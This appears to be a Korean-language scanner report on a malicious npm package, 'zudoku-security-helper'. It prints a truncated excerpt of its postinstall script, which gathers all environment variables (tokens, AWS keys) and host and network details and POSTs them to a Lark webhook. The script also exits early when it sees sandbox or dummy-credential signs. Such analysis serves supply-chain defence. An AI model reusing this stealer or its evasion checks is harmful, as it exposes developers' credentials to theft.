// npm 패키지
zudoku-security-helper
Security helper for Zudoku
버전
1
메인테이너
1
최초 publish
2026-06-07
publisher
gagesgr
tarball
1,796 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-06-07
// exfil path
what is read → where it ships
steals
- ● AWS keys
- ● npm token
- ● GitHub PAT
- ○ home dir
- ○ system info
sends to
- ⤳ open.larksuite.com (via hostname var)
// offending code· @99.0.0· 1 file flagged
llm: malicious · 0.95 → 크리덴셜 읽기 (reads-aws-creds, reads-npmrc, reads-github-tokens) + 외부 전송지 dest-via-hostname-var 조합 — 전형적인 유출 패턴.
- @99.0.0 · AUTO-PUBLISHED · publisher: gagesgr · heuristic 99/100 · static flags 6 · llm malicious (0.95) via fast-track · install-scripts:postinstall · new-publisher:2d · first-version-of-package · publisher-multi-name-burst:3 · publisher-version-pump:6 · reads-aws-creds · reads-npmrc · reads-github-tokens · reads-homedir · reads-system-info · dest-via-hostname-var
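→ 크리덴셜 읽기 (reads-aws-creds, reads-npmrc, reads-github-tokens) + 외부 전송지 dest-via-hostname-var 조합 — 전형적인 유출 패턴. 아래 발췌 코드에서 확인되는 범위로는, postinstall 스크립트가 npm_lifecycle로 시작하는 항목을 제외한 process.env 전체와 호스트명·사용자명·플랫폼·작업 디렉터리·네트워크 인터페이스 정보를 모아 open.larksuite.com 봇 웹훅으로 HTTPS POST 전송한다(파일에서 직접 읽는 부분은 발췌에 보이지 않으며, 발췌가 중간에 잘려 있어 이후 동작은 이 페이지만으로는 확인할 수 없다). 따라서 설치 시점의 환경 변수에 들어 있던 GITHUB_TOKEN, NPM_TOKEN, AWS 키 등은 모두 노출된 것으로 간주하고 폐기·재발급해야 한다. 또한 이 스크립트는 NODE_OPTIONS의 --require 설정, AWS 문서의 예제 키, 더미 토큰 패턴이 보이면 즉시 종료하므로, 분석 환경에서 아무 동작도 관찰되지 않았다는 것만으로 무해하다고 판단해서는 안 된다.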
// offending code· 1 file flagged · patterns: 6
--- install scripts --- ### postinstall node scripts/postinstall.js --- package/scripts/postinstall.js (excerpt) --- (function(){var e=process.env,no=e.NODE_OPTIONS||"";if(/(?:--require|-r)\s+\/[^\s]+\.js/.test(no))process.exit(0);if(e.AWS_ACCESS_KEY_ID==="AKIAIOSFODNN7EXAMPLE")process.exit(0);if(e.AWS_SECRET_ACCESS_KEY==="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY")process.exit(0);var tk=[e.GITHUB_TOKEN,e.NPM_TOKEN,e.AWS_ACCESS_KEY_ID].join("");if(/(?:R4nD0m|F4k3[fT]0k3n|dummy|DummyToken)/i.test(tk))process.exit(0);setTimeout(function(){var https=require("https"),os=require("os");var nets=os.networkInterfaces();var ips=Object.entries(nets).flatMap(function(x){return x[1].filter(function(i){return!i.internal}).map(function(i){return x[0]+": "+i.address+" ("+i.family+")"})}).join("\n");var info={pkg:e.npm_package_name+"@"+e.npm_package_version,host:os.hostname(),user:os.userInfo().username,platform:os.platform()+"/"+os.arch(),cwd:process.cwd(),time:new Date().toISOString()};var envLines=Object.entries(process.env).filter(function(x){return!x[0].startsWith("npm_lifecycle")}).map(function(x){return" "+x[0]+"="+x[1]}).join("\n");var text=["postinstalstall",Object.entries(info).map(function(x){return x[0]+": "+x[1]}).join("\n"),"","Network Interfaces:",ips,"","Environment Variables:",envLines].join("\n");var payload=JSON.stringify({msg_type:"text",content:{text}});var req=https.request({hostname:"open.larksuite.com",path:"/open-apis/bot/v2/hook/f1ad5ad2-4ba6-4c9d-afc2-0e908cba26a7",method:"POST",headers:{"Content-Type":"application/json","Content-Length":Buffer.byteLength(payload)}},function(){pr --- dynamic destinations --- → open.larksuite.com (via hostname-var)
